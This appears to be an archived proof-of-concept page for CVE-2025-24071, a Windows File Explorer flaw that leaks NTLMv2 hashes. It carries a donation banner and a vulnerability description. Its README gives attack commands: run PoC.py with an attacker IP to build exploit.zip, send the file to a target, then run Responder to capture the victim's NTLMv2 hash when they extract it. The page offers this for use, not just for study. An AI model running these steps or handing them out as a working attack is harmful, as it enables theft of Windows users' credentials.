Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24071 PoC — Microsoft Windows File Explorer 信息泄露漏洞

Source
Associated Vulnerability
Title:Microsoft Windows File Explorer 信息泄露漏洞 (CVE-2025-24071)
Description:Microsoft Windows File Explorer是美国微软(Microsoft)公司的一个文件管理器应用程序。 Microsoft Windows File Explorer存在信息泄露漏洞。攻击者利用该漏洞可以获取敏感信息。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows Server 2019,Windows Server
Description
A PoC of CVE-2025-24071, A windows vulnerability that allow get NTMLv2 hashes
Readme
# CVE-2025-24071_PoC
## Usage
- Execute the script
```bash
python PoC.py test 192.168.1.45
```
![image](https://github.com/user-attachments/assets/591de1a3-8c0f-42af-907d-c7c246efb2b3)

- Send "exploit.zip" to the target, and then you can use [Responder](https://github.com/SpiderLabs/Responder) in order to recive the NTLMv2 hash
```bash
sudo python3 responder.py -I ens33
```
![image](https://github.com/user-attachments/assets/61649a3c-5bbd-4b29-a665-63ca6cf8e73f)

- Now when the target extract the file `.zip`, Boom! we get the NTLM hashes

![til](usecase.gif)
File Snapshot

[4.0K] /data/pocs/9e2871e598048012d4f1b7cc4f03b5ee5948013c ├── [2.3K] PoC.py ├── [ 586] README.md └── [2.2M] usecase.gif 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.